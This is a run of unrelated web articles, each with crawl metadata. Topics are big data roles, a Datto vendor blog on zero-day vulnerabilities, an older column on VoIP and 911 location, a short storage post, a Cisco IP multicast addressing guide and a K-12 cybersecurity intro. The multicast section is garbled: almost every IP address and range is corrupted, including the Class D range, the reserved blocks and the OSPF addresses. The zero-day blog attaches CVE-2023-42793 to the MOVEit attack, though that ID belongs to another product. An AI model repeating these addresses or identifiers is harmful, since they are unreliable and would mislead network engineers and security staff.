Big data consists of extremely large volumes of structured, semi-structured, and unstructured information generated by a diverse array of sources, including business transactions, internet activity, machine data, sensor input, text, videos, and images.
At a conceptual level, big data is typically distinguished by three major characteristics, known as the three Vs:
- Volume – the huge amounts of data involved.
- Variety – which reflects the diversity of sources, types, and formats of the information.
- Velocity – which refers both to the speed at which big data is generated and the speed with which organizations have to process it in order to keep pace.
For businesses, computational analysis of very large data sets can reveal patterns, trends, and associations — especially in connection with human behavior and interactions — that fuel greater operational efficiency, enhance customer engagement, reduce costs, predict future outcomes, and enable new opportunities.
Big Data In Business
Analysis of information and the derivation of insights from it can create opportunities for organizations in any industry. Big data applications apply across a range of disciplines, including health care, finance, manufacturing, retail, software development, government, education, and infrastructure provision.
Big data analytics and data management are at work in the business arena in numerous areas, including:
- Analyzing customer and transaction data to reveal shopping habits and consumer behavior trends.
- Targeted advertising and the personalization of customer experiences.
- Fuel and route optimization for the transport industry.
- Predictive inventory ordering and supply chain optimization.
- Monitoring health conditions through data from wearables and remote diagnostics.
- Personalized health plans for cancer patients.
- Fraud and risk management in the financial services sector.
- Demand and preference-based media streaming.
- Real-time data monitoring and cyber security.
Big Data Business Professionals
Solution and service providers in the big data industry (and those private organizations fortunate enough to recruit or nurture them in-house) employ a range of specialist talent for the management, analysis, and deployment of big data projects. Let’s look at two of them in some depth.
The Big Data Engineer
A big data engineer takes responsibility for designing, developing, constructing, installing, testing and maintaining complete big data management and processing systems.
These responsibilities begin with data ingestion — taking data from various sources and ingesting it into a data lake, a centralized repository for various data sources with different formats and structures. The engineer may use different data ingestion approaches, such as batch and real-time extraction.
Since data in a raw format cannot be used directly, it has to be converted from one format to another or from one structure to another, depending on the use-case. For data transformation, the big data engineer must have a working knowledge of the various tools and custom scripts required for dealing with data of different complexity, structure, format, and volume.
Performance optimization is a top priority for the data engineer in business. The engineer must ensure that the complete process, from query execution to visualizing the data, is streamlined and optimized through reporting and interactive dashboards. This may typically involve automating processes, optimizing data delivery, and, if necessary, redesigning the complete architecture to improve performance. To accomplish this, big data engineers must be capable of handling, transforming, and managing big data using industry-standard tools, big data frameworks, and NoSQL databases.
The Big Data Analyst
Big Data analytics is the examination of extremely varied or large data sets to find relevant and useful information that can enable businesses to make informed choices. In the business realm, a big data analyst is responsible for analyzing these data sets to uncover hidden trends and patterns that will allow the organization to make more informed business decisions and gain a competitive advantage. So the data analyst’s remit includes identifying, collecting, analyzing, visualizing, and communicating this data to help business leaders navigate these future decisions.
The big data analyst must be versatile, as the job frequently involves switching roles from conducting research, to mining data for information, to presenting their findings. The ability to think critically and logically while also using creative reasoning and problem-solving skills are requisites for the job.
Data mining and auditing skills are essential. A big data analyst should also possess programming knowledge, quantitative and data interpretation skills, strong oral and written communication skills, and experience with multiple technologies and industry use cases.
Big Data Business Training
As highlighted by the two big data professional examples that we’ve seen, a diversity of deep skills is required for those working in the field, and while big data business training programs may begin at the formal academic level, the fully rounded professional also requires soft skills and some experience and knowledge of the industry.
With the salaries of Big Data Developers, Administrators, Analysts, and Architects among the highest in the industry and a shortage of talent affecting all sectors, big data certified professionals are in high demand. There are a number of big data certification schemes available, including:
Associate Certified Analytics Professional
The Associate Certified Analytics Professional (aCAP) credential is an entry-level analytics certification that demonstrates education in the analytics process, even though the individual may not have practical experience yet.
Cloudera Certified Associate (CCA) Data Analyst
Cloudera certifications help candidates design and develop data pipelines that will test their data ingestion, storage, and analysis skills. A developer in SQL who earns the CCA Data Analyst certification demonstrates core analyst skills to load, transform, and model Hadoop data to define relationships and extract meaningful results from the raw output.
Certification of Professional Achievement in Data Sciences
The Certification of Professional Achievement in Data Sciences is a non-degree program intended to develop facility with foundational data science skills. It consists of four courses: Algorithms for Data Science, Probability & Statistics, Machine Learning for Data Science, and Exploratory Data Analysis and Visualization.
Big Data In Business – By Association
Finally, one application of big data in business that manages to cash in on the hype surrounding the phenomenon without delving actively into the technology is the Big Data band. They are a contemporary electro-pop project from Brooklyn-based producer and Harvard graduate Alan Wilkis, which explores humans vs. technology themes.
Vocalist Daniel Armbruster, Rajeev Basu (“interactive/hacker”), and GHOST+COW (“visual”) contributed early input to the project, which is best known for its single “Dangerous,” featuring Joywave, which reached number one on the Billboard Alternative Songs chart in August 2014. That same year, the song was featured in the films “Veronica Mars” and “Earth to Echo.” | <urn:uuid:0d02364e-55c7-4828-9be5-a918d4aea6c5> | CC-MAIN-2024-38 | https://itchronicles.com/big-data/who-is-using-big-data-in-business/ | 2024-09-20T11:28:04Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00387.warc.gz | en | 0.918877 | 1,514 | 2.71875 | 3 |
Hackers in today’s advanced threat landscape are increasingly focusing on leveraging zero-day vulnerabilities to infiltrate systems and cause significant damage. These vulnerabilities are especially concerning for organizations because they represent unknown and unpatched weaknesses in software that attackers can exploit before anyone is aware of their existence. This unpredictability makes zero-day vulnerabilities a severe threat that requires immediate attention.
In this blog, we’ll define zero-day vulnerabilities, show a few examples of how they are exploited in business today and provide best practices for your company to defend against them. Additionally, we’ll highlight how solutions like Datto AV and Datto EDR are purpose-built to help prevent zero-day attacks from becoming a problem.
What is a zero-day vulnerability?
A zero-day vulnerability is a software flaw that is unknown to the vendor and thus has no available fix at the time it is discovered. These vulnerabilities have earned their moniker because the vendor has “zero days” to fix the flaw before malicious actors can exploit it. They differ from other cybersecurity threats due to their novelty and element of surprise, making them particularly dangerous.
Zero-day vulnerabilities often lead to zero-day exploits and zero-day attacks, which are explained below:
Zero-day vulnerability: A flaw in software that is unknown to the vendor. This lack of awareness means the vendor cannot create a patch or update to fix the flaw, leaving systems exposed to potential exploitation.
Zero-day exploit: The method used by attackers to take advantage of a zero-day vulnerability. This can include various techniques, such as injecting malicious code, gaining unauthorized access or manipulating system functions, to achieve their goals.
Zero-day attack: An attack that uses a zero-day exploit to compromise a system. These attacks are particularly dangerous because they occur before the vendor has a chance to address the vulnerability, often leading to significant damage.
Why are zero-day attacks dangerous and what is their impact?
Zero-day attacks are a growing concern in the cybersecurity landscape for several reasons. They are notoriously difficult to defend against due to their unknown nature and the critical time window between discovery and patch release. Here’s why zero-day attacks are particularly dangerous:
- Unknown vulnerabilities: Zero-day vulnerabilities are unknown to both the software vendor and users, making them extremely hard to detect and defend against. Because there is no awareness of the vulnerability, traditional defenses, such as antivirus programs and firewalls, are often ineffective.
- Exploitation window: There is a critical period between when the vulnerability is discovered by attackers and when a patch is released. During this window, systems are highly vulnerable. Attackers can exploit the vulnerability with impunity, knowing that defenses are not yet prepared to address the threat.
- Challenges in detection and mitigation: Zero-day attacks often lack signatures and use advanced evasion techniques, making them difficult to detect. These attacks can bypass traditional security measures by masking their activities or mimicking legitimate operations, making timely detection a significant challenge. The reactive nature of patching also poses significant challenges, as organizations must scramble to update their systems once a patch is available.
The impact of zero-day attacks can be severe, leading to:
- Data breaches: Zero-day exploits can lead to significant data breaches, compromising sensitive information. Attackers can steal personal data, financial information, intellectual property and other valuable assets, leading to severe consequences for individuals and organizations.
- Financial losses: The financial impact can be substantial, including costs related to data recovery, legal fees and regulatory fines. Businesses may also face expenses related to incident response, system repairs and compensation for affected customers.
- Reputation damage: The long-term damage to an organization’s reputation and customer trust can be profound. Customers may lose confidence in the organization’s ability to protect their data, leading to a loss of business and a tarnished brand image.
- Operational disruption: Zero-day attacks can disrupt business operations, leading to downtime and productivity losses. Systems may be rendered inoperable, critical services may be interrupted and business processes may be halted, resulting in significant operational challenges.
How zero-day vulnerabilities lead to zero-day attacks
Zero-day vulnerabilities are discovered by attackers before the vendors, making them hard to defend against. The lifecycle of a zero-day threat is as follows:
- Discovery: Attackers discover a vulnerability before the vendor is aware of it. This discovery can occur through various means, such as reverse engineering software, identifying flaws during penetration testing or uncovering weaknesses through routine scanning.
- Exploitation: Attackers create and deploy exploits to take advantage of the vulnerability. This can involve developing custom malware, leveraging existing exploit kits or utilizing social engineering techniques to deliver the exploit to the target system.
- Detection: Security researchers or vendors identify the exploit. This may occur through monitoring network traffic, analyzing suspicious activities or investigating reports from affected users. Once detected, efforts are made to understand the exploit and its impact.
- Mitigation: The vendor develops and releases a patch to fix the vulnerability. This process involves identifying the root cause of the vulnerability, developing a solution and distributing the patch to affected systems. Users must then apply the patch to protect their systems.
Attackers use this process to compromise systems and data, often causing significant damage before the vulnerability can be patched.
Who are targets for zero-day attacks?
Zero-day attacks can target a wide range of organizations and individuals. Common targets include:
- Large enterprises and corporations: These organizations often hold vast amounts of sensitive data, making them attractive targets. They may possess financial records, intellectual property, customer data and other valuable assets that attackers seek to exploit.
- Government agencies: Government systems can contain critical information and infrastructure, making them high-value targets. Attacks on government agencies can disrupt national security, public services and diplomatic activities.
- Financial institutions: Banks and other financial institutions are prime targets due to the financial data they hold. Successful attacks can lead to theft of funds, fraud and significant financial losses for both the institution and its customers.
- Healthcare organizations: Medical records are valuable, and healthcare systems are often targeted for their sensitive patient data. Attacks on healthcare organizations can disrupt patient care, compromise patient privacy and lead to regulatory fines.
- Educational institutions: Schools and universities can be targeted for both research data and personal information. Attacks can disrupt academic activities, compromise student and staff data and affect research projects.
- Noteworthy individuals: High-profile individuals, including executives and celebrities, can be targets for personal data and credentials. Attacks can lead to identity theft, financial fraud and reputational damage.
Examples of zero-day attacks
Here are a few notable examples of zero-day attacks:
Chrome zero-day vulnerability (CVE-2024-0519)
Upon discovering the issue, Google promptly responded by releasing a security update designed to patch the vulnerability and users were advised to update their Chrome browsers immediately.
MOVEit Transfer zero-day attack (CVE-2023–42793)
In May 2023, a zero-day vulnerability was exploited in MOVEit Transfer, a managed file transfer software. This vulnerability allowed attackers to use methods such as Remote Code Execution (RCE) and Authentication Bypass. Exploits of the vulnerability led to data breaches, financial losses, and operational disruptions for the affected organizations.
In response, security teams promptly investigated the incident, reported the vulnerability, and implemented mitigation measures. The vendor then released patches to address the vulnerability but the incident underscored the critical importance of maintaining proactive security practices.
How to identify zero-day vulnerabilities
Detecting zero-day vulnerabilities is crucial for protecting systems and data. Key detection methods include:
- Behavioral analysis: Monitoring for unusual behavior that may indicate an exploit. This involves analyzing patterns of activity that deviate from normal operations, such as unexpected network traffic or unauthorized access attempts.
- Heuristic analysis: Using algorithms to identify patterns that suggest a zero-day attack. Heuristic analysis involves examining code and system behavior to identify characteristics of known exploits or suspicious activities.
- Signature-based detection: Comparing known attack signatures to detect anomalies. This method relies on a database of known malware signatures and can identify previously detected threats but may struggle with novel exploits.
- Machine learning (ML) and AI: Leveraging AI to detect previously unknown threats through pattern recognition. Machine learning models can analyze vast amounts of data to identify subtle indicators of compromise and adapt to new threats over time.
- Threat intelligence: Gathering and analyzing information about potential threats from various sources. Threat intelligence involves collecting data from cybersecurity communities, industry reports and other sources to stay informed about emerging threats and vulnerabilities.
How to prevent zero-day attacks
Preventive measures are essential for protecting against zero-day attacks. Listed below are some effective strategies.
Regular software updates and patch management
Ensuring all software is up to date with the latest security patches. Regularly updating software helps close known vulnerabilities and reduce the risk of exploitation.
Dividing the network into segments to limit the spread of an attack. By isolating critical systems, organizations can contain potential breaches and prevent attackers from accessing the entire network.
Allowing only approved applications to run on the network reduces the attack surface by preventing unauthorized or malicious software from executing.
Intrusion detection and prevention systems (IDS/IPS)
Detecting and preventing malicious activity. IDS/IPS solutions monitor network traffic for suspicious behavior and can automatically block or mitigate potential threats.
Endpoint protection solutions
Using tools like Datto AV and Datto EDR to protect endpoints. These solutions provide comprehensive security for devices, including antivirus, firewall and threat detection capabilities.
Employing robust antivirus solutions to detect and mitigate threats. Antivirus software can identify and remove known malware, providing an additional layer of defense against zero-day attacks.
How can Datto help?
Datto offers advanced solutions like Datto AV and Datto EDR to help prevent zero-day attacks. These tools have proven to be highly effective, as highlighted by an independent study from Miercom.
The study revealed that “Both Datto EDR and Datto AV achieved a 98% detection rate for zero-day threats, which is more than double the industry average for products in this class of 45%.”
Datto AV and Datto EDR offer the following features to help protect against zero-day threats:
- Real-time threat detection: Identifies and mitigates threats as they occur. This feature allows for immediate response to potential attacks, minimizing damage and preventing the spread of malware.
- Advanced behavioral analysis: Detects unusual activity that may indicate an attack. By continuously monitoring system behavior, Datto solutions can identify deviations from normal operations and flag potential threats.
- Comprehensive endpoint protection: Protects all endpoints in the network from potential threats. Datto AV and Datto EDR provide robust security for devices, ensuring that vulnerabilities are addressed and threats are mitigated.
To learn more about securing your endpoints, check out this recorded session on Locking Down Your Endpoints From Advanced Attack today.
Prevent zero-day attacks with Datto AV and Datto EDR
Zero-day vulnerabilities pose a significant threat to organizations due to their unknown nature and the difficulty in defending against them. By understanding what zero-day vulnerabilities are, how they are exploited and the impact they can have, organizations can better prepare and protect themselves. Solutions like Datto AV and Datto EDR are designed to provide robust protection against these threats, ensuring that your organization remains secure.
Request a demo of Datto AV and Datto EDR today to see how these powerful tools can help you prevent zero-day attacks and protect your critical data. | <urn:uuid:b98ba025-3aca-441c-9bdb-a0afbe779074> | CC-MAIN-2024-38 | https://www.datto.com/blog/what-is-a-zero-day-vulnerability/ | 2024-09-08T05:51:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650960.90/warc/CC-MAIN-20240908052321-20240908082321-00587.warc.gz | en | 0.940018 | 2,426 | 2.890625 | 3 |
In the January 2000 issue, I described all the wonderful innovations I foresaw in our future. This January, I describe a problem that some of this innovation is causing.
"Johnny, call 911 and tell them to send an ambulance!" It sounds pretty simple. Johnny picks up the telephone, dials 911, and the ambulance is expected any moment. Only, Johnny is four years old and his mother is busy performing CPR on his little brother, whom she just pulled from the bottom of the backyard pool.
Throughout the U.S. and Canada, 911 is the universal emergency number for assistance during an emergency. When you dial 911, you are routed to a Public Safety Answering Point (PSAP), and most of the time a display tells the emergency dispatcher where you are calling from, even if you cannot verbally relay that information. That capability is known as enhanced 911, or E911.
It all began in 1957, when the National Association of Fire Chiefs recommended using a single number nationwide for reporting fires. And in 1967, the President's Commission on Law Enforcement and Administration of Justice recommended using a single number nationwide for reporting all emergencies. After much support, the President's Commission on Civil Disorders tasked the Federal Communications Commission (FCC) with finding a solution.
In November 1967, the FCC met with the American Telephone and Telegraph Company (AT&T), and the next year, AT&T announced that it would establish 911 as the emergency code throughout the United States. Why did AT&T choose 911? Because it was short, easy to remember, and had never been authorized as an office code, area code, or service code anywhere in the North American dialing plan.
As the new millennium began, 93% of the population living in 96% of the geographic U.S. was covered by some type of 911 service. And 95% of that coverage was enhanced 911.
But will the ambulance arrive in time? Will it arrive at all? That depends.
Thanks to all the emergency/rescue/police dramas on television, we all know that the ambulance is sent to the address where the telephone lives. But what if your telephone doesn't always live at the same address? Take, for example, the proliferation of wireless telephones today.
Improving wireless 911
Enter the FCC with a plan to improve wireless 911 services. According to the FCC, wireless carriers are to provide emergency dispatchers with information on the location from which a wireless call is being made. This is not just a "couple-of-mouse-clicks-and-they're-compliant" type of thing. Hence, wireless E911 is being implemented in two phases.
Phase I requires wireless carriers to deliver to the emergency dispatcher the telephone number of a wireless handset originating a 911 call, as well as the location of the cell site or base station receiving the 911 call. This provides only a rough indication of the caller's location.
Phase II requires carriers to deliver more specific latitude and longitude location information, known as Automatic Location Identification (ALI), to the dispatcher. And then we, the users, will all have to have E911-capable handsets. Yes, that means you may need a new cell phone to take advantage of the E911 service. To determine if your handset is E911-compliant, check with your service provider.
But what about the new voice over Internet Protocol (VoIP) telephones? Like wireless telephones, the telephone number of the IP telephone stays with the instrument. But unlike wireless telephones, there are no Phase I and Phase II requirements. So today, if the user moves a VoIP telephone and does not call the network administrator to report the move, there is no way to tell where the telephone is actually located. For example, let's say Johnny's mom, who is working from home this week, brought her VoIP telephone home from her office and connected it to her home network. When Johnny calls 911, an ambulance is promptly dispatched to mom's downtown office.
VoIP pushing 911's limits
This scenario is becoming more likely as telecommunications providers focus on converting telephone calls to data, and sending them around the world cheaply and efficiently. E911 is designed to work with the public switched telephone networks (PSTNs). Relatively few carriers operate these models of standardization and discipline. The Internet, however, is neither standardized nor disciplined. To set up personal long distance, one has only to buy a computer, install and configure a sound card and a microphone, install some software, and start making calls.
There is no question that VoIP benefits customers. But it also raises new and bewildering questions for public safety dispatchers, who are answering 911 calls that either carry no name, no address, or lack other location data that could help locate the caller. Worse yet, sometimes the dispatcher can receive information that sends the emergency vehicle off in the wrong direction.
Several manufacturers offer traditional-style telephones that connect to an IP network instead of a telephone wall outlet, can be conventionally dialed, and route voice calls as if they were being handled by the PSTN. Other manufacturers offer business-sized VoIP solutions that link extension to a central private branch exchange (PBX), and route calls to the PSTN or branch offices.
Several alternative long-distance carriers have announced that they will build IP networks to carry their customers' telephone traffic, or partner with companies that have IP network capacity. Even local exchange carriers are beginning to look at how they can better provide a broad range of voice, video, and data services to the residence. And the IP network may be the answer.
The problem: currently, there is no way of logging or identifying these IP nodes so they will display information when a user dials 911, and there are no VoIP directory services. Instead, each user group with VoIP capability must create and maintain its own list of IP addresses, and link them to names and locations. This, of course, assumes that users like Johnny's mom actually update the whereabouts of the telephone set, which is not likely. Why? Because there is no penalty, no calling in for activation. Unlike wireline services, the intelligence is in the telephone instrument, not on the cable. Sort of like a wireless instrument with a line cord to plug into a data network and no FCC requirements for ALI.
But I believe that relief is on the way. On May 1, 2000, President Clinton signed an executive order ending the government's intentional degradation of the global positioning system's (GPS) accuracy. President Clinton's order switched off the so-called "selective availability" (SA) feature of the GPS. SA continuously varied the accuracy of the civilian signal, effectively reducing its accuracy to 100 meters-not much help when you are trying to locate a heart attack victim in a high-rise area of a big city.
Because the civilian signal now has an accuracy of 20 meters or better, rest assured that many wireless carriers will select GPS to meet the FCC's E911 Phase II location requirements for wireless telephones. That means greater demand for the enabling chips, which means a lower cost per chip is likely. All this makes GPS-generated latitude and longitude for VoIP telephones a cost-effective solution to Johnny and his mom's problems. And yes, just like with wireless, that means you will need even newer VoIP telephones to take advantage of the E911 service.
By merging voice and data on one network, you could be managing only one network, not two. You could eliminate the PBX altogether and reduce the amount of cabling required in the work areas. VoIP will reduce the need for technicians to perform moves and adds, as people change offices within the network. Through the use of virtual private networks, VoIP can also support telecommuters and mobile workers.
Now, if we could just get a fire truck when we need one.
Donna Ballast is a communications analyst at The University of Texas at Austin and a BICSI registered communications distribution designer (rcdd). Questions can be sent to her at Cabling Installation & Maintenance or at PO Drawer 7580, The University of Texas, Austin, TX 78713; tel: (512) 471-0112, fax: (512) 471-8883, e-mail: [email protected]. | <urn:uuid:67536923-6bff-4428-a26f-8cf07f906769> | CC-MAIN-2024-38 | https://www.cablinginstall.com/home/article/16466194/answering-the-wireless-emergency-call | 2024-09-12T00:13:30Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00287.warc.gz | en | 0.942757 | 1,713 | 3.078125 | 3 |
Ed Grigson asks is storage is “fungible”, but most of his post focuses on what fungibility means in relation to IT:
In plain English fungibility means something is interchangeable — a common example is money. If someone owes you ten dollars you don’t care if they pay you one ten dollar bill, two fives, or ten ones — you get essentially the same thing. Another example is that you’re supposed to eat five portions of fruit and veg every day but you could eat five fruits, five veg, or a mixture — they’re fungible (interchangeable).
Now we know what is it but who cares if something is fungible?
- for consumers fungibility is a good thing as it increases competition and flexibility — you can buy your commodity from anyone, often driving down prices
- for providers fungibility could be good and bad. The increased competition might benefit your competitors but history has shown that once a market becomes a commodity it tends to grow, leading to more business for all involved.
So is storage fungible? It’s easy to see holes in the concept when it comes to the “inertia” of storage – after all, you can’t easily move data! So is storage fungible? Go over to Ed’s post and reply! Is storage a fungible commodity? | <urn:uuid:333f8fe7-ff06-4a5f-808c-2216dc544d67> | CC-MAIN-2024-38 | https://gestaltit.com/all/stephen/is-storage-a-fungible-commodity/ | 2024-09-09T14:18:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00587.warc.gz | en | 0.965572 | 288 | 2.578125 | 3 |
Information About IP Multicast Technology
Role of IP Multicast in Information Delivery
IP multicast is a bandwidth-conserving technology that reduces traffic by delivering a single stream of information simultaneously to potentially thousands of businesses and homes. Applications that take advantage of multicast include video conferencing, corporate communications, distance learning, and distribution of software, stock quotes, and news.
IP multicast routing enables a host (source) to send packets to a group of hosts (receivers) anywhere within the IP network by using a special form of IP address called the IP multicast group address. The sending host inserts the multicast group address into the IP destination address field of the packet and IP multicast routers and multilayer switches forward incoming IP multicast packets out all interfaces that lead to the members of the multicast group. Any host, regardless of whether it is a member of a group, can send to a group. However, only the members of a group receive the message.
IP Multicast Routing Protocols
The software supports the following protocols to implement IP multicast routing:
IGMP is used between hosts on a LAN and the routers on that LAN to track the multicast groups of which hosts are members.
Protocol Independent Multicast (PIM) is used between routers so that they can track which multicast packets to forward to each other and to their directly connected LANs.
This figure shows where these protocols operate within the IP multicast environment.
Multicast Group Transmission Scheme
IP communication consists of hosts that act as senders and receivers of traffic as shown in the first figure. Senders are called sources. Traditional IP communication is accomplished by a single host source sending packets to another single host (unicast transmission) or to all hosts (broadcast transmission). IP multicast provides a third scheme, allowing a host to send packets to a subset of all hosts (multicast transmission). This subset of receiving hosts is called a multicast group. The hosts that belong to a multicast group are called group members.
Multicast is based on this group concept. A multicast group is an arbitrary number of receivers that join a group in order to receive a particular data stream. This multicast group has no physical or geographical boundaries--the hosts can be located anywhere on the Internet or on any private internetwork. Hosts that are interested in receiving data from a source to a particular group must join that group. Joining a group is accomplished by a host receiver by way of the Internet Group Management Protocol (IGMP).
In a multicast environment, any host, regardless of whether it is a member of a group, can send to a group. However, only the members of a group can receive packets sent to that group. Multicast packets are delivered to a group using best-effort reliability, just like IP unicast packets.
In the next figure, the receivers (the designated multicast group) are interested in receiving the video data stream from the source. The receivers indicate their interest by sending an IGMP host report to the routers in the network. The routers are then responsible for delivering the data from the source to the receivers. The routers use Protocol Independent Multicast (PIM) to dynamically create a multicast distribution tree. The video data stream will then be delivered only to the network segments that are in the path between the source and the receivers.
IP Multicast Boundary
As shown in the figure, address scoping defines domain boundaries so that domains with RPs that have the same IP address do not leak into each other. Scoping is performed on the subnet boundaries within large domains and on the boundaries between the domain and the Internet.
You can set up an administratively scoped boundary on an interface for multicast group addresses using the ip multicast boundary command with the access-list argument. A standard access list defines the range of addresses affected. When a boundary is set up, no multicast data packets are allowed to flow across the boundary from either direction. The boundary allows the same multicast group address to be reused in different administrative domains.
The Internet Assigned Numbers Authority (IANA) has designated the multicast address range 188.8.131.52 to 184.108.40.206 as the administratively scoped addresses. This range of addresses can be reused in domains administered by different organizations. They would be considered local, not globally unique.
You can configure the filter-autorp keyword to examine and filter Auto-RP discovery and announcement messages at the administratively scoped boundary. Any Auto-RP group range announcements from the Auto-RP packets that are denied by the boundary access control list (ACL) are removed. An Auto-RP group range announcement is permitted and passed by the boundary only if all addresses in the Auto-RP group range are permitted by the boundary ACL. If any address is not permitted, the entire group range is filtered and removed from the Auto-RP message before the Auto-RP message is forwarded.
IP Multicast Group Addressing
A multicast group is identified by its multicast group address. Multicast packets are delivered to that multicast group address. Unlike unicast addresses that uniquely identify a single host, multicast IP addresses do not identify a particular host. To receive the data sent to a multicast address, a host must join the group that address identifies. The data is sent to the multicast address and received by all the hosts that have joined the group indicating that they wish to receive traffic sent to that group. The multicast group address is assigned to a group at the source. Network administrators who assign multicast group addresses must make sure the addresses conform to the multicast address range assignments reserved by the Internet Assigned Numbers Authority (IANA).
IP Class D Addresses
IP multicast addresses have been assigned to the IPv4 Class D address space by IANA. The high-order four bits of a Class D address are 1110. Therefore, host group addresses can be in the range 220.127.116.11 to 18.104.22.168. A multicast address is chosen at the source (sender) for the receivers in a multicast group.
The Class D address range is used only for the group address or destination address of IP multicast traffic. The source address for multicast datagrams is always the unicast source address. |
IP Multicast Address Scoping
The multicast address range is subdivided to provide predictable behavior for various address ranges and for address reuse within smaller domains. The table provides a summary of the multicast address ranges. A brief summary description of each range follows.
Reserved Link-Local Addresses |
22.214.171.124 to 126.96.36.199 |
Reserved for use by network protocols on a local network segment. |
Globally Scoped Addresses |
188.8.131.52 to 184.108.40.206 |
Reserved to send multicast data between organizations and across the Internet. |
Source Specific Multicast |
220.127.116.11 to 18.104.22.168 |
Reserved for use with the SSM datagram delivery model where data is forwarded only to receivers that have explicitly joined the group. |
GLOP Addresses |
22.214.171.124 to 126.96.36.199 |
Reserved for statically defined addresses by organizations that already have an assigned autonomous system (AS) domain number. |
Limited Scope Address |
188.8.131.52 to 184.108.40.206 |
Reserved as administratively or limited scope addresses for use in private multicast domains. |
Reserved Link-Local Addresses
The IANA has reserved the range 220.127.116.11 to 18.104.22.168 for use by network protocols on a local network segment. Packets with an address in this range are local in scope and are not forwarded by IP routers. Packets with link local destination addresses are typically sent with a time-to-live (TTL) value of 1 and are not forwarded by a router.
Within this range, reserved link-local addresses provide network protocol functions for which they are reserved. Network protocols use these addresses for automatic router discovery and to communicate important routing information. For example, Open Shortest Path First (OSPF) uses the IP addresses 22.214.171.124 and 126.96.36.199 to exchange link-state information.
IANA assigns single multicast address requests for network protocols or network applications out of the 224.0.1.xxx address range. Multicast routers forward these multicast addresses.
All the packets with reserved link-local addresses are punted to CPU by default in the ASR 903 RSP2 Module. |
Globally Scoped Addresses
Addresses in the range 188.8.131.52 to 184.108.40.206 are called globally scoped addresses. These addresses are used to send multicast data between organizations across the Internet. Some of these addresses have been reserved by IANA for use by multicast applications. For example, the IP address 220.127.116.11 is reserved for Network Time Protocol (NTP).
Source Specific Multicast Addresses
Addresses in the range 18.104.22.168/8 are reserved for Source Specific Multicast (SSM) by IANA. In Cisco IOS software, you can use the ip pim ssm command to configure SSM for arbitrary IP multicast addresses also. SSM is an extension of Protocol Independent Multicast (PIM) that allows for an efficient data delivery mechanism in one-to-many communications. SSM is described in the IP Multicast Delivery Modes section.
GLOP addressing (as proposed by RFC 2770, GLOP Addressing in 233/8) proposes that the 22.214.171.124/8 range be reserved for statically defined addresses by organizations that already have an AS number reserved. This practice is called GLOP addressing. The AS number of the domain is embedded into the second and third octets of the 126.96.36.199/8 address range. For example, AS 62010 is written in hexadecimal format as F23A. Separating the two octets F2 and 3A results in 242 and 58 in decimal format. These values result in a subnet of 188.8.131.52/24 that would be globally reserved for AS 62010 to use.
Limited Scope Addresses
The range 184.108.40.206 to 220.127.116.11 is reserved as administratively or limited scoped addresses for use in private multicast domains. These addresses are constrained to a local group or organization. Companies, universities, and other organizations can use limited scope addresses to have local multicast applications that will not be forwarded outside their domain. Routers typically are configured with filters to prevent multicast traffic in this address range from flowing outside an autonomous system (AS) or any user-defined domain. Within an AS or domain, the limited scope address range can be further subdivided so that local multicast boundaries can be defined.
Network administrators may use multicast addresses in this range, inside a domain, without conflicting with others elsewhere in the Internet. |
Layer 2 Multicast Addresses
Historically, network interface cards (NICs) on a LAN segment could receive only packets destined for their burned-in MAC address or the broadcast MAC address. In IP multicast, several hosts need to be able to receive a single data stream with a common destination MAC address. Some means had to be devised so that multiple hosts could receive the same packet and still be able to differentiate between several multicast groups. One method to accomplish this is to map IP multicast Class D addresses directly to a MAC address. Using this method, NICs can receive packets destined to many different MAC address.
Cisco Group Management Protocol ( CGMP) is used on routers connected to Catalyst switches to perform tasks similar to those performed by IGMP. CGMP is necessary for those Catalyst switches that cannot distinguish between IP multicast data packets and IGMP report messages, both of which are addressed to the same group address at the MAC level.
IP Multicast Delivery Modes
IP multicast delivery modes differ only for the receiver hosts, not for the source hosts. A source host sends IP multicast packets with its own IP address as the IP source address of the packet and a group address as the IP destination address of the packet.
Source Specific Multicast
Source Specific Multicast (SSM) is a datagram delivery model that best supports one-to-many applications, also known as broadcast applications. SSM is a core network technology for the Cisco implementation of IP multicast targeted for audio and video broadcast application environments.
For the SSM delivery mode, an IP multicast receiver host must use IGMP Version 3 (IGMPv3) to subscribe to channel (S,G). By subscribing to this channel, the receiver host is indicating that it wants to receive IP multicast traffic sent by source host S to group G. The network will deliver IP multicast packets from source host S to group G to all hosts in the network that have subscribed to the channel (S, G).
SSM does not require group address allocation within the network, only within each source host. Different applications running on the same source host must use different SSM groups. Different applications running on different source hosts can arbitrarily reuse SSM group addresses without causing any excess traffic on the network. | <urn:uuid:1fef5e94-49d6-4102-93b4-17973eb1f36c> | CC-MAIN-2024-38 | https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst2960cx_3650cx/software/release/15-2_4_e/configurationguide/b_1524e_consolidated_3560cx_2960cx_cg/b_1524e_consolidated_3560cx_2960cx_cg_chapter_0100110.html | 2024-09-10T20:14:29Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651318.34/warc/CC-MAIN-20240910192923-20240910222923-00487.warc.gz | en | 0.92839 | 2,819 | 3.515625 | 4 |
According to The State of K-12 Cybersecurity 2020 Year in Review report published by the K12 Security Information Exchange and the K-12 Cybersecurity Resource Center:
“. . . the 2020 calendar year saw a record-breaking number of publicly-disclosed school cyber incidents. Moreover, many of these incidents were significant: resulting in school closures, millions of dollars of stolen taxpayer dollars, and student data breaches directly linked to identity theft and credit fraud.“
The threat to districts from cyber attacks is clear, and it is increasing. But the line between cybersecurity and student safety is still blurred for many district IT teams. K-12 cyber safety and K-12 cybersecurity strategies continue to focus on network and web search monitoring. However, more school data is created and stored in cloud applications like Google Workspace for Education and Microsoft 365. Therefore, it’s critical that districts monitor and secure their cloud apps.
Schools provide cloud applications to students for learning, collaboration, and communication purposes, but students don’t always use those apps for schoolwork. Schools are experiencing greater rates of cybersecurity and safety incidents within their own cloud applications.
Toxic online behavior and student cyber safety have been an issue for schools and their communities for quite some time now. As students become more comfortable with using school technology, they are also becoming more comfortable using it to communicate with each other and to express their own thoughts. For example, students are increasingly using Google Docs to journal their thoughts and feelings.
